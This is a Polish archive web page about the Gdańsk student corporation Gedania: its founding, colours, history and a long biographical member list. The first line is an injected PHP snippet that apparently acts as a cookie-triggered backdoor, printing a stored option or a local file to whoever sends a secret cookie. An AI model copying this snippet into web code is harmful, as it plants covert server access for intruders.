if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Gedania

Dekiel Gedanii - vide Poszukiwania. Nazwa:
Korporacja “Polski Związek Akademicki Gedania”
Siedziba:
Gdańsk
Data powstania:
2 II 1922 r.
Barwy:
błękitna – biała – czerwona (symbolika barw: kolor morza – czystość postępowania – miłość Ojczyzny)
Dewiza:
„Veritate ac labore” („Prawdą i pracą”)

Rys historyczny

Gedania nad Bałtykiem, prawd. lata 20-te.

Gedanię założono dnia 2 II 1922 r.. Dnia 9 marca 1924 r. została przyjęta do Związku Polskich Korporacji Akademickich na członka kandydującego (data starszeństwa związkowego: 9 III 1924 r.). Prawa członka rzeczywistego uzyskała w czerwcu 1925 r. W 1933 r., w związku ze sporami na tle reakcji korporacji związkowych na ograniczenia przez władze sanacyjne autonomii szkół wyższych, wystąpiła ze Związku. Od kwietnia 1924 r. (1925 r. ?) istniało Koło Filistrów.

Herb Gedanii, 1939 r.

Celem powołania Gedanii była praca na rzecz uświadamiania narodowego oraz zbliżenia z miejscową ludnością pochodzenia polskiego. Zgodnie z tym założeniem członkowie Gedanii wygłaszali referaty, prowadzili kursy języka polskiego, uczestniczyli w obchodach ludowych i inicjatywach społeczności polskiej na terenie Wolnego Miasta Gdańska i Kaszub.

Dewizka Zbigniewa Orzeszkowskiego, druga poł. lat 30-tych.

Siedziba Korporacji mieściła się w Polskim Domu Akademickim we Wrzeszczu przy ul. Heeresanger 11a (obecnie ul. Legionów).

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 89 nazwisk, w tym jednego członka honorowego.
Komers Gedanii, prawd. lata 30-te.

Brak wiadomości o działalności Gedanii oraz o spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

Poniższa, niekompletna lista członków Gedanii obejmuje niemal 90 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Włodzimierz Gruetzmacher (Grützmacher), (5 (17) lipca 1871 - 31 października 1959) z miejsc. Czołówek w gub. warszawskiej, s. Antoniego, brat Kazimierza (Welecja), ojciec Antoniego i Henryka (obaj Chrobria), student Wydziału Mechanicznego PR 1892-1901, członek Welecji, naczelnik warsztatów Dróg Żelaznych Północnych (naczelnik sekcji trakcji na kolei Moskiewsko-Jarosławsko-Archangielskiej), dyrektor Wydziału Mechanicznego Poznańskiej Dyrekcji M.K.Z., Filister honorowy Gedanii, pochowany na Cmentarzu Junikowskim w Poznaniu

Członkowie rzeczywiści

  Bogdan Adamczak.

 1. Bogdan Adamczak, (10 sierpnia 1909 w Gosłowicach - 4 lutego 1995 w Toruniu) absolwent Gimnazjum w Kaliszu 1930, student Wydziału Chemicznego PG 1932-39, c. 1933 (?), sekretarz sem. zim. 1933/34, członek Komisji Kwalifikacyjnej Bratniej Pomocy, Koła Chemików, AZS-u oraz Sodalicji Mariańskiej, w czasie wojny pracownik cukrowni “Dobre”, po wojnie uzyskał tytuł inż. chemika, pracował w przemyśle cukrowniczym 1945-75, m.in. naczelny inż. Okręgu Pomorskiego w Toruniu, odznaczony m.in. Orderem Sztandaru Pracy II klasy

 2. Tadeusz Arczyński, ( - 1945) z Westfalii, student i absolwent Wydziału Architektury PG 1933-37, pchor. rez., w 1939 znalazł się Szawlach na Litwie kowieńskiej, tam aresztowany przez NKWD i deportowany w głąb ZSRR, zwolniony w 1943, zmobilizowany w ZSRR do I Dywizji Kościuszkowskiej, zginął podczas działań wojennych
 3. Józef Bachleda-Curuś, (1912/13 - listopad 1993) z Zakopanego, student Wydziału Lotniczego PG 1936-39, c. 1936, po kampanii wrześniowej 1939 w Wielkiej Brytanii, lotnik w 307 Nocnym Dywizjonie Myśliwskim “Lwowskich Puchaczy”, po wojnie na emigracji w Wielkiej Brytanii
 4. Stefan Bassak, sekretarz Gdańskiego Koła Międzykorporacyjnego 1930
 5. Feliks Błaszak, student Wydziału Lotniczego PG 1930-33, członek Zarządu Koła Lotniczego PG
 6. Stefan Buczkowski, student PG 1921-24, założyciel Gedanii 1922
 7. Aleksander Bzdawka, student PG 1925-31
 8. Karol Czapke (Tschapke), (7 lipca 1912 - 1990) student Wydziału Chemicznego PG 1932-39, w wojnie obronnej 1939 w 25 Pułku Artylerii Lekkiej, wcielony przymusowo do Wehrmachtu, uciekł przez linię frontu do ZSRR i tam wstąpił do I Armii LWP, po wojnie ukończył studia PG, pracował jako asystent w Katedrze Technologii Chemii PG, a następnie w Instytucie Rybackim w Gdyni, autor wielu publikacji naukowych
 9. Władysław Czekajło, student Wydziału Budowy Okrętów PG 1923-25, członek zarządu “Korabji”

  Ignacy Czerniewski, 1902-1906.

 10. Ignacy Czerniewski, (2 sierpnia 1882 w miejsc. Wieliż na Ziemi Witebskiej - 5 sierpnia 1956 w Krakowie) z Kowieńszczyzny, s. Adama i Michaliny z d. Malinowskich, uczeń Prywatnego Gimnazjum Klasycznego w Tukumie w Kurlandii, eksternistycznie ukończył Gimnazjum w Razaniu 1900, student i absolwent (inż. technolog) Wydziału Mechanicznego PR 1900-06, przyjęty do Arkonii 1902 (nr ew. 753), po studiach na różnych stanowiskach jako pomocnik kierownika działu wagonowego, naczelnik Oddziału Wagonowego, a w końcu kierownik Działu Wagonowego w Zarządzie Kolei Środkowo Azjatyckiej (Taszkient, Kuszka, Merew, Aschabad) 1906-18, tłumacz z jęz. angielskiego na rosyjski i perski w MSZ w Kabulu 1918-19, w obozie dla jeńców cywilnych Belgaum w Indiach Brytyjskich 1919-20, założyciel Korporacji Gedania w Gdańsku 1922, kierownik działu wagonowego w Dyrekcji Kolei Państwowych w Gdańsku 1920-23, komisarz Ministerswa Kolei Żelaznych w Gdańskiej Fabryce Wagonów i Zakładach Przemysłowych 1923-25, pracował na różnych stanowiskach od zastępcy naczelnika służb mechanicznych do wicedyrektora w Dyrekcji Kolei Państwowych (Gdańsk, Toruń, Radom, Kraków, Poznań) 1925-39, od 1939 poszukiwany przez Niemców, w czasie okupacji ukrywał się pracując jako robotnik drogowy i leśny, od maja 1940 we wsi Międzybrodzie Bielskie, po wojnie dyrektor PKP w Krakowie 1945, a następnie organizator i dziekan Wydziału Komunikacji AGH w Krakowie 1945-56, kierownik Katedry Gospodarki Trakcyjnej i Naprawy Taboru Kolejowego, delegat Ministerstwa Komunikacji przy Wydziałach Politechnicznych AGH, organizator i kierownik Technicznego Studium Zaocznego Wydziału Mechanicznego Politechniki Krakowskiej, pochowany na Cmentarzu Rakowickim w Krakowie, odznaczony m.in. Złotym Krzyżem Zasługi, Krzyżem Oficerskim OOP i Medalem Dziesięciolecia
 11. Jerzy Czerwiński, (8 stycznia 1910 w Warszawie - 1990 w Gdańsku) student i absolwent Wydziału Budowy Maszyn PG 1929-37, po studiach pracował w Urzędzie Morskim w Gdyni, walczył w wojnie obronnej 1939, jeniec oflagu IIC Woldenberg, po wojnie pracował w przedsiębiorstwach budowlanych, m.in. odbudowywał budynek teatru w Gdańsku oraz prowadził budowę kombinatu sportowego “Olivia”, odznaczony Krzyżem Kawalerskim OOP

 12. Zbigniew Domański, z Krzeszowic k. Krakowa, student Wydziału Architektury PG 1935-39
 13. Jerzy Drzewiecki, student Wydziału Budowy Maszyn PG 1928-34, po wojnie pracował w Energoprojekcie w Warszawie
 14. Alfred Fiebiger, (26 lipca 1906 w Łodzi - lipiec 1974 w Danii) z rodziny producentów fortepianów, student i absolwent Wydziału Architektury PG 1925-31, prezes sem. let. 1928/29, po studiach architekt miejski w Ostrowie Wlkp., uczestnik wojny obronnej 1939, w niewoli niemieckiej 1939-41, zwolniony w 1941, w konspiracji jako łącznik między AK a konspiracyjną grupą działającą w Kaliszu, aresztowany 1944 i zesłany do więzienia do Rzeszy, po oswobodzeniu pracował jako dyrektor techniczny PBOR-u, później dyrektor Okręgowej Dyrekcji Inwestycji Miejskich w Zabrzu, jednocześnie starszy asystent w Katedrze Urbanistyki PŚ, pochowany w Ostrowie Wielkopolskim
 15. Tadeusz Gayczak, (25 sierpnia 1907 - zm.) absolwent Mikołaja Kopernika we Lwowie 1927, student Wydziału Chemicznego PG 1928-1933, współzałożyciel orkiestry Bratniej Pomocy Studentów PG
 16. Waldemar Germar (German?), student Wydziału Budowy Maszyn PG 1922-28, założyciel Gedanii 1922, prezes 1927
 17. Jerzy Grycmacher, z Tczewa, student Wydziału Budownictwa Lądowego PG 1936-39, po wojnie na emigracji w Szwecji
 18. Grycman, (?)
 19. Kazimierz Haydasz, z Tczewa, student PG 1935-39, olderman sem. zim. 1938/39
 20. Aleksander Hillar, (30 maja 1905 we wsi Rajkowy k. Pelplina - 29 listopada 1983 w Tczewie) absolwent Gimnazjum Klasycznego w Pszczynie, student Wydziału Chemicznego PG 1926-28 i 1934-35, po studiach główny chemik w cukrowni “Pruszcz”, a później kierownik techniczny cukrowni “Mątwy” w Inowrocławiu, w czasie wojny w oflagu Woldenberg, po wojnie dyrektor cukrowni “Mątwy” w Inowrocławiu, a później cukrowni w Ciężkowicach w woj. opolskim, pracuje także w Opolskim Zjednoczeniu Przemysłu Cukrowniczego, główny technolog Fabryki Kwasu Cytrynowego w Raciborzu, członek Stowarzyszenia Techników Cukrowników

  Józef Hirsch.

 21. Józef Hirsch, (9 kwietnia 1904 w Kościerzynie - prawd. 25 sierpnia 1942 w Stutthofie) s. Antoniego i Salomei z Kamińskich, brat Antoniego Marcina i Wiktora (obaj Magna-Polonia), prawd. student budownictwa PG 1924-28, wiceprezes sem. let. 1926/27, członek Związku Studentów Polaków PG i AZS, po studiach pracował w Magistracie Kościerzyny jako budowniczy miejski, krótko przed wojną mianowany komendantem służby porządku, działacz Związku Zachodniego, po wkroczeniu Niemców wyprowadził mężczyzn zdolnych do walki w stronę Świecia, został aresztowany, osadzony w obozie i zamordowany, pochowany na cmentarzu na Zaspie w Gdańsku

 22. Zygmunt Idzikowski, (1911 - 1943 w Stutthofie) absolwent Gimnazjum w Zakopanym 1930, student Wydziału Budownictwa Lądowego PG 1931-36, zakupił niewielki majątek k. Brodnicy nad Drwęcą, aresztowany przez Gestapo w 1939 i osadzony w obozie koncentracyjnym w Stutthofie, tam zginął
 23. Wacław Jarmułowicz, ( - 1979 w Londynie) student Wydziału Budowy Maszyn PG 1925-34, sekretarz 1927, uratował wpław trzy osoby z płonącego kutra na nabrzeżu Mołtawy za co otrzymał honorowe obywatelstwo Wolnego Miasta Gdańska, po wojnie na emigracji w Wielkiej Brytanii
 24. Tadeusz Feliks Jaroszyński, (29 maja 1918 w Puławach - po 2008) absolwent Gimnazjum w Warzawie 1936, student Wydziału Budowy Okrętów 1937-39, latem 1939 odbywał praktykę w stoczni w Holandii, od października 1939 w PSZ we Francji, po upadku Francji 1940 wraz z wojskiem polskim ewakuowany do Wielkiej Brytanii, delegowany do ukończenia studiów, student i absolwent Uniwersytetu w Newcastle, skierowany do pracy w Biurze Konstrukcyjnym Brytyjskiej Admiralicji w Bath, po demobilizacji pozostał na emigracji, pracował w Lloyd’s Register of Shipping w Londynie i w Newcastle, od 1953 pracownik a od 1963 kierownik hiszpańskiego oddziału Lloyd’a w Madrycie, pozostał w Hiszpanii, odznaczony Comendador de la Orden del Merito Civil
 25. Włodzimierz Jegorow, (23 czerwca 1906 w Libawie na Łotwie - 14 czerwca 1960 w Gdyni) s. Włodzimierza i Stanisławy z d. Bubienko, absolwent Gimnazjum w Równem, student i absolwent Wydziału Budowy Maszyn PG 1928-32, student Wydziału Wschodniego (?) USB, od 1938 makler w Gdynii, w czasie wojny wysiedlony przez Niemców z Gdynii, okupację spędził w Równem, po wojnie wrócił do Gdyni 1945, pracował w Przedsiębiorstwie Robót Geodezyjnych oraz jkao inżynier d/s postępu i racjonalizacji w Przedsiębiorstwie Usług Rybnych i Połowów “Arka”, pochowany na Cmentarzu Komunalnym w Gdynii-Witominie
 26. Ludwik Jekiełek, (ok. 1900 - 1950 w Krakowie) student Wydziału Elektrycznego PG 1922-32, założyciel Gedanii 1922, wystąpił 1925/26, inicjator i założyciel Rosevii, autor deklaracji ideowej i statutu, prezes 1928, sternik, żeglarz morski, podczas i po wojnie posiadał firmę elektroinstalacyjną

  Edmund Jereczek.

 27. Edmund Jereczek, (27 października 1904 w Kościerzynie - 25 sierpnia 1984 w Anglii) absolwent Polskiego Gimnazjum w Kościerzynie, student Wydziału Budowy Maszyn PG 1924-25 i 1931-32, sekretarz sem. let. 1928/29, pilot i organizator Aeroklubu Gdańskiego 1931-32, w wojnie obronnej 1939 walczył jako pilot w obronie Gdyni i Kępy Oksywskiej, na polecenie dowódcy Obrony Lądowej Wybrzeża płk. Dąbka odprowadza samolot RWD 13 do Szwecji, wylądował na wyspie Gotlandia, ewakuowany do Wielkiej Brytanii, brał udział w Bitwie o Anglię, wyróżniony licznymi odznaczeniami polskimi i brytyjskimi

 28. Witold Kabalec, z Ukrainy, student Wydziału Architektury PG 1935-39
 29. Jan Kamocki, ( - wrzesień 1944 w Warszawie) student Wydziału Budowy Maszyn PG 1935-3?, sekretarz sem. zim. 1938/39, w czasie okupacji mieszkał w Warszawie, żołnierz AK, w Powstaniu Warszawskim w Batalionie “Zośka”, poległ w walkach
 30. Zbigniew Kapałka, ( - 1967) student Wydziału Architektury PG 1925-34
 31. Dymitr Karpuk, z Białorusi, student Wydziału Budownictwa Lądowego PR 1931-37
 32. Gustaw Ludolf Jan Kindt, (21 lutego 1911 w Radomiu - 1940 w Katyniu) s. Gustawa i Klary z Lehmanów, student PG 1932-35, po studiach pracował w rodzinnej Fabryce Maszyn Rolniczych Gustawa Kindta w Radomiu, absolwent Szkoły Podchorążych 1936, przydzielony do Ośrodka Zapasowego Artylerii Przeciwlotniczej nr 2, w niewoli sowieckiej, zamordowany przez NKWD
 33. Zbigniew Kleeberg, ( - po 1945 w Warszawie) s. Franciszka (generała) i Wandy z Paszkowskich, student Wydziału Budowy Maszyn PG 1937
 34. Aleksander Krzemieniecki, (31 stycznia 1909 w Poczdamie - po 1971) student i absolwent Wydziału Budowy Maszyn PG 1927-33, po studiach pracował w Okręgowej Dyrekcji PKP w Toruniu, w tym od 1937 jako naczelnik Oddziału Mechanicznego, w wojnie obronnej 1939 reklamowany z wojska kierował transportami jednostek wojskowych oraz przewozami w rejonie bitwy nad Bzurą, w czasie okupacji w AK, od 1945 jako wicedyrektor DOKP Gdańsk kierował odbudową i uruchomieniem jednostek PKP, od 1957 jako dyrektor kierował organizacją i budową Centralnego Ośrodka Badań i Rozwoju Kolejnictwa w Warszawie, członek Rady d/s Techniki przy Prezesie Rady Ministrów, członek Komitetu Dyrekcyjnego ORE (Office de Recherches et d’Essais de l’Union Internationale des Chemins de Fer) w Utrechcie oraz komisji stałej AICCF w Brukseli, obronił doktorat PG 1971, odznaczony Krzyżem Kawalerskim i Komandorskim OOP
 35. StanisŁaw Kubalka, student Wydziału Budowy Maszyn PG 1929-34
 36. Władysław Lewandowski, ( - lata 60-te w Gdańsku) student PG 1928-37, wiceprezes sem. zim. 1932/33, członek Zarządu AZS-u, po wojnie jeden z organizatorów AZS PG 1946-47
 37. Limbach, (?)

  Leon Lisiecki, 1927 r.

 38. Leon Lisiecki, (- 1945 pod Lwowem) student Wydziału Budownictwa PG 1921-27, olderman 1927, prezes Gdańskiego Koła Międzykorporacyjnego 1927, jako oficer i dowódca oddziału AK poległ pod Lwowem

 39. Konstanty Łuczko, ( - 1937) student Wydziału Budowy Maszyn PG 1921-28, założyciel Gedanii 1922

  Antoni Matheus, prawd. ok. 1930 r.

 40. Antoni Matheus., (13 grudnia 1905 w Poznaniu - 8 sierpnia 1992 w Gdańsku) absolwent Gimnazjum św. Marii Magdaleny w Poznaniu 1924, student matematyki UP 1924/25, student Wydziału Budowy Maszyn PG 1925-35, kierownik Aeroklubu Gdańskiego, w czasie wojny wywieziony na przymusowe roboty do Niemiec, po wojnie kierownik Aeroklubie Gdańskim i jak sekretarz generalny Aeroklubu PRL, kierownik zakładu usług agrolotniczych w Gdańsku 1972-75, odznaczony Złotym Krzyżem Zasługi oraz dyplomem Pawła Tissandiera przyznanym przez Federation Aeronatique Internationale za wkład w rozwój lotnictwa w Polsce

  Witold Mazgaj, 1927 r.

 41. Witold Mazgaj, student Wydziału Chemicznego PG 1925-33, wiceprezes 1927

 42. Wiesław Michalik, student PG 1921-27, założyciel Gedanii 1922
 43. Józef Michalski, student PG 1921-29
 44. Stanisław Mroczkowski, ( - 1978 w Sopocie) student PG 1933-39, wiceprezes sem. zim. 1934/35, wielokrotny olderman
 45. Edward Musiał, z Wolsztyna, student i absolwent Wydziału Elektrycznego PG 1928-33, po uzyskaniu dyplomu wrócił do Wolsztyna, gdzie kierował własnym tartakiem
 46. Kazimierz Nowak, ( - 1972 w Sopocie) student Wydziału Budownictwa Lądowego PG 1931-39, sekretarz sem. zim. 1934/35, po wojnie w Sopocie
 47. Aleksander Nowakowski, (7 października 1906 w Sulmierzycach - 23 marca 1993 w Sopocie) s. Konrada (leśniczego) i Marii z d. Nowicka, absolwent Gimnazjum w Krotoszynie, student i absolwent (mgr inż.) Wydziału Budowy Okrętów PG 1925-34, uczęszczał do The Royal Technical College w Glasgow, praktyki zagraniczne w stoczniach we Francji i Szkocji, pracował jako inspektor celny w stoczniach gdańskich w WM Gdańsku, w czasie wojny w Armii Andersa, wrócił do kraju w 1947, pracował na stanowiskach kierowniczach w przemyśle stoczniowym w Gdańskiej Stoczni Remontowej, w CBKO-1, w b. Przedsiębiorstwie Demontażu Wraków, przez kilka lat prowadził Zakład Żeglugi w Instytucie Morskim w Gdańsku, autor prac badawczych w zakresie budowy holowników, lodołamaczy i pontonów do podnoszenia statków, rzeczozwca okrętowy, dyrektor stoczni w Ghanie 1962-68, po powrocie do emerytury w 1972 główny specjalista w Zjednoczeniu Morskich Stoczni Remontowych, gdzie rozwinął budowę jednostek rybackich oraz statków specjalnych, odznaczony Krzyżem Kawalerskim OOP, Medalem Zwycięstwa i Wolności, Odznaką Opiekuna Miejsc Pamięci Narodowej, pochowany na cmentarzu w Sopocie
 48. Władysław Nowakowski, student Wydziału Budowy Okrętów PG 1926-34, prezes sem. zim. 1932/33, po wojnie pracował w hucie “Kościuszko”
 49. Teobald Olejnik, (27 sierpnia 1906 - 9 marca 1990 w Poznaniu) szwagier Bolesława i Kazimierza Kurpiszów (obaj Lechia), student i absolwent Wydziału Budowy Maszyn PG 1924-31, po studiach nauczyciel w Gimnazjum Mechanicznym w Pabianicach, poza dydaktyką zajmował się m.in.. Konstrukcją i eksploatacją wlewnic do produkcji żeliwnych odlewów cienkościennych oraz konstrukcją szlifierki bezkłowej i uruchomieniem jej produkcji w fabryce prochu w Pionkach, aresztowany w 1939, osadzony w obozie w Radogoszczy po Łodzią, skierowany na roboty przymusowe do Niemiec, w 1945 wrócił do Łodzi, dyrektor Fabryki Obrabiarek w Łodzi, w 1949 naczelny dyrektor Centralnego Zarządu Taboru Kolejowego “Tasco” w Poznaniu, od 1952 prorektor Wyższej Szkoły Inżynierskiej w Poznaniu, po włączeniu Szkoły do PP organizuje Katedrę i Zakład Ekonomiki i Organizacji, prof. nadzw. 1963, prof. zw. 1972, organizator i dyrektor Instytutu Organizacji i Zarządzania 1970, autor kilkudziesięciu publikacji naukowych, pochowany w Poznaniu
 50. Zbigniew Orzeszkowski, (20 maja 1917 w Leszczynie w pow. płockim - 2001) student Wydziału Elektrycznego PG 1935-39, c. 1937, prezes sem. zim. 1938/39, w czasie okupacji w AK, uczestnik Powstania Warszawskiego, ukończył studia PWr. 1947 (inż. elektryk), dr 1961, dr hab. 1967, prof. PWr., odznaczony m.in. Krzyżem Kawalerskim OOP
 51. Leon Otlewski, (13 października 1914 w Berlinie -1990) z Tczewa, student Wydziału Budownictwa Lądowego PG 1935-38, w wojnie obronnej 1939 w obronie Warszawy, w niewoli niemieckiej w obozie jenieckim, z którego uciekł, aresztowany i osadzony w obozie koncentracyjnym w Stutthofie, Sachsenhausen i Mauthausen, studia ukończył po wojnie 1957 PW, pracował do 1975 jako zastępca naczelnika w Oddziale Geodezyjnym DOKP w Gdańsku, wykładał na Państwowej Szkole Budownictwa w Gdańsku
 52. Arnold Peukert (po wojnie Pojkert), (30 października 1912 w Kaliszu - 14 grudnia 1968(?) w Bielsku Białej) student Wydziału Elektrycznego PG 1933-39, po wojnie prowadził budowę Elektrowni “Miechowice” i elektrociepłowni w Bielsku Białej, w latach 60-tych dyrektor ds. inwestycji elektrowni szczytowo-pompowej “Porąbka-Żar”
 53. Jerzy Pospischil, (28 lipca 1913 we Lwowie - 1998) absolwent Gimnazjum w Poznaniu 1931, student Wydziału Budownictwa Lądowego PG 1931-39, dyplom uzyskał po wojnie PG 1945, po dyplomie pracował nad odbudową falochronu głównego w porcie gdyńskim, pracownik PPB “Hydrotrest” w Gdańsku 1950-52, kierował m.in. robotami związanymi z przebudową wejścia głównego do portu w Gdyni oraz budową bazy rybackiej w Świnoujściu, naczelny inż. Zjednoczonego Budownictwa Morskiego w Gdańsku, m.in. przy realizacji nabrzeża rudowego huty Stołczyn w Szczecinie, pochylni bocznych oraz suchego doku w stoczni gdyńskiej, rurociągu żelbetowego Mątwy-Wisła, hydroelektrowni Koronowo oraz rozbudowy portu Famagusta na Cyprze, później pracował w przedsiębiorstwie “Hydrobudowa 10″ jako kierownik działu technicznego i przygotowania produkcji hydroelektrowni na Solnie, od 1973 kierownik pracowni projektowej w przedsiębiorstwie “Hydrobudowa 4″ w Gdańsku

  Stefan Praschil, przed 1939 r.

 54. Stefan Leopold Praschil, (1 września 1907 w Krakowie - 2 czerwca 1942 nad Niemcami) student Wydziału Elektrycznego PG, od 1938 pilot sportowy, w wojnie obronnej 1939 w 2 Pułku Lotniczym w Krakowie, po kampanii wrześniowej przedostał się przez Rumunię do Francji, a w lipcu 1940 do Anglii, przydzielony do 301 dywizjonu bombowego, zginął śmiercią lotnika podczas lotu bojowego nad Niemcami, odznaczony Krzyżem Walecznych, leży na cmentarzu Drendock w Belgii

  Tadeusz Prechitko, lata 30-te.

 55. Tadeusz Prechitko (10 października 1913 we Lwowie - 19 września 1982 w Warszawie) s Józefa i Janiny z d. Szober, absolwent Gimnazjum Polskiego w Gdańsku 1932, drużynowy Drużyny Morskiej im. Zygmunta Augusta, hufcowy IV Hufca Morskiego, pilot Gdańskiej Chorągwi Harcerzy, student i absolwent (inż. budowy okrętów) Wydziału Budowy Maszyn Okrętowych PG 1932-39, żeglarz, dowódca jachtów w Polskim Klubie Morskim w rejsach do Szwecji, Anglii i Norwegii, podczas Olimpiady w Berlinie 1936 w regatach kapitan załogi jachtu “Korsarz”, który zdobył I miejsce, od lipca 1939 w Marynarce Wojennej WP, w wojnie obronnej 1939 w obronie Helu, w czasie wojny w organizacji wywiadowczej AK “Muszkieterowie” ps. “Tadeusz Czapski”, po wojnie w 1945 po odmowie zatrudnienia w przemyśle okrętowym pracował w Państwowych Warsztatach Samochodowych, później od 1948 pracownik “Polimexu”, w Centralnym Biurze Konstrukcji Okrętowych nr 1 1951-57, naczelny dyrektor Centrali Morskiej Importowo-Eksportowej “Centromor” w Warszawie 1957-65, następnie radca handlowy przy ambasadzie PRL w Teheranie 1965-71, dyrektor jednego z biur Centrali Handlu Zagranicznego “Polimex-Cekop” 1971-76, w tym okresie pracował także jako konsultant techniczny warszawskiego oddziału firmy Sulzer, ekspert Polskiej Izby Handlu Zagranicznego, prezes Polsko-Belgijsko-Luksemburskiej Izby Handlowej, ekspert Międzynarodowej Organizacji Handlu przy ONZ, współzałożyciel i red. naczelny miesięcznika “Budownictwo Okrętowe” 1956-59, komandor Polskiego Klubu Morskiego 1957-59, odznaczony m.in. Srebrnym Krzyżem ZHP, Złotym Krzyżem Zasługi, Krzyżem Oficerskim Orderu Korony Belgijskiej i irańską Komandorią Orderu Homayum III klasy, pochowany na warszawskich Powązkach

  Henryk Rosochowicz, prawd. ok. 1919 r.

 56. Henryk Rosochowicz, (?) (19 stycznia 1900 w Miłosławiu k. Wrześni - 4 lutego 1942 w Auschwitz) student i absolwent Wydziału Budowy Maszyn Okrętowych PG 1919-24, członek Wisły, założyciel Gedanii 1922, po studiach pracownik Wydziału Maszynowego Gdańskiej Dyrekcji Kolei Państwowej, później kierownik Wydziału Maszynowego Zarządu Partu w Gdańsku, w końcu września 1939 aresztowany przez Gestapo, wywieziony do obozu koncentracyjnego w Auschwitz

 57. Bohdan Różyński, z Warszawy, student PG 1935-39, wiceprezes sem. zim. 1938/39
 58. Florian Rychlicki, (11 lutego 1910 w Poznaniu - po 1975) absolwent Gimnazjum im. K. Marcinkowskiego 1928, student i absolwent Wydziału Architektury PG 1929-1947, przez dwa lata w zarządzie Bratniej Pomocy Studentów PG, w wojnie obronnej 1939, m.in. w bitwie pod wsią Kiernozia k. Łowicza, wzięty do niewoli niemieckiej uciekł, w czasie wojny pracował jako projektant w Zakładach “H. Cegielskiego”, działacz konspiracyjny, po wojnie zorganizował Biuro Odbudowy Gmachów Uniwersyteckich, był także do 1975 generalnym projektantem obiektów przy Starym Rynku w Poznaniu, odznaczony m.in. Krzyżem Kawalerskim OOP
 59. Henryk Saganowski, student Wydziału Chemicznego PG, w czasie okupacji osadzony w obozie koncentracyjnym w Dachau, po wojnie dyplom PW
 60. Ludwik Seifert, student PG 1931-35, po wojnie mieszkał w Rumunii
 61. Witold Selde vel Selce (Selle), ( - wrzesień 1939) student Wydziału Budownictwa Lądowego PG 1930-36, zginął na froncie
 62. Jerzy Siewierski,
 63. Leon Spychalski, student PG 1925-30

  Stanisław Strzałko (?), 1927-1928 r.

 64. Stanisław Strzałko, student Wydziału Budowy Maszyn PG 1922-28

 65. Bronisław Strzelczyk, student Wydziału Chemicznego PG 1922-29, założyciel Gedanii 1922, wystąpił 1925/26, założyciel Rosevii, olderman sem. let. 1932/33, po studiach pracował w Marynarce Wojennej w Gdyni, a następnie przed i po wojnie w Zakładach Akumulatorowych “Tudor” w Piastowie k. Warszawy
 66. Jan Szlachcic, (16 stycznia 1901 w Jaworznie w pow. chorzowskim - po 1968) matura 1920, student i absolwent Wydziału Budowy Maszyn PG 1921-30, założyciel Gedanii 1922, wystąpił 1925/26, założyciel Rosevii, sekretarz “Macierzy Szkolnej” w Gdańsku wspierającej Polskie Gimnazjum w Gdańsku, po studiach pracował w gdańskiej DOKP, żołnierz AK, organizator oddziałów AK w rejonie Zatora, aresztowany w 1945 i skierowany do kopalni miedzi na Dolnym Śląsku, po 1950 w biurach projektów w Gdańsku i Bydgoszczy, a następnie w Kombinacie Budowlanym w Pile 1960-68

  Franciszek Szudrowicz, 1927 r.

 67. Franciszek Szudrowicz, ( - 1945 na Syberii) z Gdańska, student Wydziału Elektrycznego PG 1922-29, założyciel Gedanii 1922, zginął na Syberii

  Witold Szulczewski, 1927 r.

 68. Witold Szulczewski, student Wydziału Budowy Maszyn PG 1925-34

  Tadeusz Szybowicz, 1927 r.

 69. Tadeusz Szybowicz, ( - po 1945) student Wydziału Elektrycznego PG 1922-35, założyciel Gedanii 1922

 70. Kazimierz Szydłowski, ( - 1933) student Wydziału Lotniczego PG 1928-33, prezes sem. zim. 1933/34, olderman sem. zim. 1934/35, zginął w katastrofie lotniczej w Szkole Podchorążych Lotnictwa w czasie odbywania ostatniego lotu przed zakończeniem szkolenia

  Kazimierz Szymański, 1927 r.

 71. Kazimierz Ludwik Szymański, (1909-1975) student i absolwent Wydziału Elektrycznego PG 1926-33, po wojnie pracował na PP, doc. dr hab., kierował Zakładem Napędów Przemysłowych i Trakcyjnych w Instytucie Elektrotechniki

 72. Antoni Świderski, (17 stycznia 1913 na Krymie - 11 lipca 1990 w Ottawie) s. Tadeusza i Anny, brat Tadeusza (Gedania), absolwent Gimnazjum w Wieluniu 1930, student i absolwent Wydziału Lotniczego PG 1931-36, sekretarz sem. zim. 1932/33 oraz sem. zim. 1933/34, po studiach rozpoczął w Lubelskiej Wytwórni Samolotów, uczestnik wojny obronnej 1939, po kampanii we Francji w polskich jednostkach lotniczych, później przez Hiszpanię, Brazylię dostał się do Kanady, gdzie skierowany został do pracy w przemyśle lotniczym w Toronto, po wojnie pozostał na emigracji w Kanadzie, pracował w przemyśle stalowym, a później w kopalni azbestu, od 1951 inż. w Computing Devices of Canada, później w National Research Council of Canada
 73. Tadeusz Świderski, (1911-1992) s. Tadeusza i Anny, brat Antoniego (Gedania), student i absolwent (inż. budownictwa lądowego) Wydziału Budownictwa Lądowego PG 1929-35, c. 1930, prezes sem. zim. 1934/35, po studiach do 1939 w Instytucie Technicznym Lotnictwa w oddziale budowy płatowców, aresztowany w 1940 i osadzony w obozie koncentracyjnym w Dachau, po wojnie na emigracji w Kanadzie, pracował m.in. jako projektant przy budowie rafinerii, a później w Toronto Transit Commission 1958-81, odpowiadał za budowę metra w Toronto, napisał “Guide to the structural Design of Underground Structures”
 74. Tadeusz Świecki, ( - po 1945 w Warszawie) student Wydziału Elektrycznego PG 1936-39
 75. Władysław Tarnowski, ( - 1959 w Warszawie) student Wydziału Elektrycznego PG 1931-37, pracował w różnych przedsiębiorstwach na Śląsku
 76. Gerard Tkaczyk, z Tczewa, student PG 1929-35
